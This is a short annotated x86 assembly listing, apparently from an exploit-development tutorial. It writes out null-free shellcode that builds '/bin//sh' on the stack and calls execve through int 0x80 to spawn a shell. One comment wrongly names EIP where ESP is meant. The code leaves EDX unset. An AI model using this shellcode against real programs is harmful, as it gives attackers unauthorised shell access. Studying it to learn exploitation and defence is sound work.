devexploit4

1. section .text
2. global _start; this tell the OS where the program starts
3. _start:
4. xor eax, eax; we zero out EAX. Its value is now 0
5. push eax ; We push a null terminated string onto the stack. First comes 0x00000000 from EAX
6. push 0x68732f2f; ASCII sh//
7. push 0x6e69622f; ASCII nib/
8. ; As the stack is 4-byte aligned, we push /bin//sh, which is 8 letters (8 bytes)
9. ; the additional slash is an alignment.
10. mov ebx, esp ;currently the string /bin/sh is on the top of the stack. As EIP points to the top of the stack, we move it to ebx as pointer to$
11. mov ecx, eax ; eax is still 0 as we didn’t change it. Let's copy the zero to ecx.
12. mov al, 0xb ; we move 11 to eax, but we do it by targeting the lowest quarter of EAX. this way, we
13. ; use the value 0xb without nulls.
14. int 0x80 ; interrupt - execute syscall.
15.  
16.